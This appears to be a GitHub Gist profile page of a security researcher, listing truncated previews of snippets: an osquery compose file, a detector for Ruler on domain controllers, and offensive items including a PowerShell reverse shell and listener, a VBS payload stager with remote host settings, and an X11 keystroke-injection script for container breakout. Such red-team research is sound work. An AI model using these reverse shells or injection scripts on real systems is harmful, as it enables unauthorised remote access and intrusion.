Skip to content

Instantly share code, notes, and snippets.

Avatar

Etienne Stalmans staaldraad

View GitHub Profile
@staaldraad
staaldraad / docker-compose.yml
Created Jun 12, 2017
A docker-compose yml to use with Doorman and osquery
View docker-compose.yml
version: '2'
services:
doorman:
image: doorman
container_name: "doorman"
build:
context: ./doorman
dockerfile: Dockerfile_doorman
links:
@staaldraad
staaldraad / onDC.ps1
Created May 30, 2017
Detect Possible Ruler usage On Exchange and Domain Controller
View onDC.ps1
Get-EventLog -InstanceId 4776 -LogName "Security" | ForEach-Object {
$sp = $_.message -split "`n"
$tmp = $sp | Select-String -Pattern 'RULER'
if($tmp.count -ge 1){
Write-Host "Possible Ruler usage at: " $_.TimeGenerated
$sp | Select-String -Pattern 'Logon Account:' | write-host
}
}
@staaldraad
staaldraad / Command.vbs
Last active Oct 16, 2019
Using VBSMeter with Ruler
View Command.vbs
Call X()
End Function
Dim RHOST: RHOST = "x.x.x.x"
Dim RPORT: RPORT = "8999"
Function Base64ToStream(b)
Dim enc, length, ba, transform, ms
Set enc = CreateObject("System.Text.ASCIIEncoding")
length = enc.GetByteCount_2(b)
@staaldraad
staaldraad / ioctlfilter.c
Created Mar 21, 2017
Filters keycodes from R400 presenter in Linux
View ioctlfilter.c
/* Grabs all input from Logitech R400 presenter and filters to ensure only certain keys are pressed.
* Ensures that only valid R400 keys are pressed and not rogue keys injected.
* Main logic for this found here: http://stackoverflow.com/questions/7668872/need-to-intercept-hid-keyboard-events-and-then-block-them
* Author: Etienne Stalmans <etienne@sensepost.com>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
@staaldraad
staaldraad / webdavserv.go
Last active Oct 12, 2020
A small webdav server in go
View webdavserv.go
package main
import (
"flag"
"fmt"
"log"
"net/http"
"os"
"golang.org/x/net/webdav"
@staaldraad
staaldraad / receivefile.ps1
Created Feb 24, 2017
Small powershell script to bind to port, accept connection and stream to file. useful for ```cat blah.exe | nc 192.168.1.7 8080```
View receivefile.ps1
$socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080);
if($socket -eq $null){
exit 1;
}
$socket.start();
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;
$file = 'c:/afile.exe';
$fileStream = New-Object System.IO.FileStream($file, [System.IO.FileMode]'Create', [System.IO.FileAccess]'Write');
@staaldraad
staaldraad / count words and sort
Created Dec 9, 2016
Count all words in a list and sort
View count words and sort
grep -v "^\s*$" /tmp/cracked| sort | uniq -c | sort -bnr
@staaldraad
staaldraad / mini-reverse.ps1
Created Oct 3, 2016
A reverse shell in Powershell
View mini-reverse.ps1
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
@staaldraad
staaldraad / mini-reverse-listener.ps1
Created Oct 3, 2016
A reverse shell listener in powershell
View mini-reverse-listener.ps1
$socket = new-object System.Net.Sockets.TcpListener('127.0.0.1', 413);
if($socket -eq $null){
exit 1
}
$socket.start()
$client = $socket.AcceptTcpClient()
write-output "[*] Connection!"
@staaldraad
staaldraad / x11.py
Last active Jun 2, 2019
Python script to do keystrokes via X11 abstract socket. Useful for silly docker breakout.
View x11.py
#!/usr/bin/python
"""
Python script to connect to an abstract unix socket created by X11 and send arbitrary key-strokes.
Created by: etienne@sensepost.com
Credits to: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/x11/x11_keyboard_exec.rb
Borrowed heavily from the original metasploit module. Thanks!
"""
from socket import *
import subprocess
You can’t perform that action at this time.